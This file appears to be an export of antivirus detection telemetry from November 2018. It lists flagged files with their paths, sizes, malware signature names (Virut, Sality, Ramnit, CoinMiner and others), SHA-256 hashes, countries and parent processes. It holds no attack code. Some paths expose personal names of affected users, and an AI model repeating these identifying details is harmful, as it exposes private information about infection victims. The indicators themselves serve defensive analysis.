  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\o5ekxefvz1l\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-222852-690e4277', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_38dcba02\\AVSCAN-20181031-222735-596326C1\\AVSCAN-20181031-222852-690E4277', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T02:29:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093826-b991c26a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093826-B991C26A', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:38:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cv concorso.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\cv formatori e allievi\\cv concorso.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ybbsncqf.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\YbbSNcQF.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='impresión                                   .scr', filepath='E:\\impresión                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='analisi bartolozzi.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\analisi BARTOLOZZI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsu6C57.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T20:39:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='click.exe', filepath='C:\\Users\\X\\Desktop\\Juegos\\click.exe', filesize=3840000, name='HEUR/AGEN.1027581.#M1.#R1'), hash='cb9b6b99d68c0c040ccb00a14ff7271d5860de99b2827c1b9feb73cfc69518ee', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:09:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='salvi rosaria.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\SALVI ROSARIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bkcohhvj.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\BKcOHhvj.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libtcmalloc.dll', filepath='C:\\Program Files\\Garena\\Garena\\2.0.1808.1611\\libtcmalloc.dll', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='f0436525a43a8ddea447dc6005e768916dba3f7f362054ecd3214f1b496e65a6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-01T12:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hgfqnxbl.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\hGFqNXbl.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181104-140252-f2ca8995', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140252-F2CA8995', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-51-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:22:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165502-1e0ed033', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a26de54b\\AVSCAN-20181104-165349-14DFEADC\\AVSCAN-20181104-165502-1E0ED033', filesize=1544000, name='PUA/InstallCore.#M1.#R1'), hash='75f16ca3b9fbba7e9d285763687617436a03374d28780809f5e5a198eaa77830', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:52:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T09:23:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003389.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003389.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='a2c768335533bd7f98d854b480f9296c931d447f9ad1358aef2177a7cd7e3b3b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='C:\\Users\\X\\Desktop\\مجلد جديد (6)\\P_Ysoft.W10Mangr_sigma4pc.com\\P@tch\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='C:\\Windows\\System32\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6d5e7983d3eeab79b7e37834f5d6db1ea18ccb3ddd176e0cd5c30bbdc36f4f10', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (2).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (2).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T09:25:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130929-0f4559ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130929-0F4559AB', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:09:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153500-c09f98de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153500-C09F98DE', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate (3).exe', filepath='C:\\Users\\X\\Downloads\\flashupdate (3).exe', filesize=1536000, name='TR/CoinMiner.BZ.#M1.#R1'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:35:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-151954-2286eb32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-151954-2286EB32', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:19:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='E:\\العاب\\الابطال الخارقون\\سونك 2\\autorun.exe', filesize=4096000, name='W32/Ramnit.C.#M1.#R1'), hash='084c65c8650c7dfb95135dc74c9b7e800c9de71aac6a38dffaadefce84798a0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe15_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe15 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T13:05:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='001.ビューワ.exe', filepath='C:\\Users\\X\\Downloads\\EMERGENCE (Complete) [En]\\EMERGENCE (Complete) [English]\\001.ビューワ.exe', filesize=896000, name='TR/Dropper.Gen.#M300.#R3781'), hash='582c4bd9a09821bb3845f098ddc204205343722d36b1b6ef0b5e81a10288e6d7', metadata=Row(cmdline='x -o\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\*\\\\\\\\\\\\\\" -spe -slp -an -ai#7zMap32198:994:7zEvent812', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\7-Zip\\7zG.exe', parentsize=576000, timestamp='2018-11-04T21:33:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122254-adbffb63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24c2bae8\\AVSCAN-20181104-121126-1AF5F320\\AVSCAN-20181104-122254-ADBFFB63', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:05:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='usbintel.sys', filepath='\\\\nas-server\\public\\festplatte usb3\\hddrive2go (q)\\WINDOWS\\$ntservicepackuninstall$\\usbintel.sys', filesize=16000, name='TR/Patched.Ren.Gen2.#M300.#R100869'), hash='73b479f135402f32681565a9850d9138817f9a20dad6ec3af58daf16471240bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:F5z5xDfD6EeUp\\\\\\/js.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T15:01:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libegl.dll', filepath='\\\\?\\C:\\Program Files (x86)\\crxbro Browser\\crxbro\\libegl.dll', filesize=80000, name='TR/Ghokswa.bbago.#M1.#R1'), hash='608157045d1092d1192901f7476b7aaabdd1237ef69ac4539c0ed85b7a374921', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:33:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='eccyq.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\eccyq.exe', filesize=2560000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='01766c45d95807f53617e7b39a692d510e4dbdd220ca7aed44bd852ed782ace5', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:01:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ducsetup.exe', filepath='D:\\الهارد\\New folder\\my Share\\Mostafa-Mahdy\\from D\\Ahmed-elbeltagyEngineering Stuff\\New Folder (2)\\CD 02-Softwares\\ELITE\\With cracks\\DuctSize\\ducsetup.exe', filesize=11328000, name='W32/Sality.AT.#M1.#R1'), hash='67e5eb1547e13b86d2003eb45acdbe5354f342c666c4436ed07c3c208e2b9edc', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe11_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:38:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='7b10276e5701c1a391e40686cbe8e2dd94256bd6d9bb74387d81e86c825eb970', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:18:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5b392469a4065a11c3b8bb6d3b8ae8551fd05d21', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5b392469a4065a11c3b8bb6d3b8ae8551fd05d21', filesize=1536000, name='HEUR/APC.#M1.#R1'), hash='721538a11c305ec08d20729ca44017419b9235b4c24e16608dd76b7b470a16a8', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:16:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243f4', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243f4', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:50:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miroir 2017.exe', filepath='G:\\MIROIR 2017.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:11:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-233819-c74232b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a57514be\\AVSCAN-20181104-233732-AB0615D8\\AVSCAN-20181104-233819-C74232B9', filesize=3328000, name='TR/Crypt.Agent.ca2a13.#M1.#R1'), hash='ca2a137a1db4dd4738bf9e58e630982fece26fb01eb1a59ac544641f8388f582', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:38:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:29:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-171028-6fb6b90a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e506a573\\AVSCAN-20181104-170956-6B7F1CCA\\AVSCAN-20181104-171028-6FB6B90A', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='780e043b1976c6be79409f30a9b67d3d2a888119d814a915e73712acda1b0ccc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='6e58bcf3b3c63bfa20c0962699e1d70f07c771ff7da19d0f8d3353a2c0186f04', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:07:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lan5810wr0_lge.exe', filepath='D:\\ISMAEL\\LAN5810WR0_LGE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:17:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.BW.#M1.#R1'), hash='51f89e3e19261fc1bfe1a4b1ecfa5c9cc4029d741c66d74629205faa41c57265', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-04T09:30:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:52:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3904304, timestamp='2018-11-04T16:30:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmpeywja52m', filepath='/tmp/tmpeywja52m', filesize=448000, name='TR/Crypt.ZPACK.Gen8.#M2.#R700208'), hash='448acf244dba595c2df19c04c0e918e6cdb5296365c62b873885f788f753d223', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:22:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ufcgetvf.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\ufcGetVF.dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='52e5f3c36713991b5258abf76f5cc49856b5aa9c8b3fada2a672f1375b847c82', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T17:14:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-192023-c7f5911e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1065741a\\AVSCAN-20181104-190059-409DD963\\AVSCAN-20181104-192023-C7F5911E', filesize=20000, name='PUA/Linkury.Gen2.#M1.#R1'), hash='797bc2e1605894671f47c6ea764651c13c25d19586e546839a16308566618432', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:18:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ueres.dll', filepath='\\\\?\\L:\\程式\\UltraEdit\\ueres.dll', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='8381f59d4143ae23439faca744ce6278b9053d01633ea65284024ae2bd7b08de', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:45:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152013-67e9bf65', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-151954-6604AE06\\AVSCAN-20181104-152013-67E9BF65', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:20:28Z'), dt=datetime.date(2018, 11, 4)),
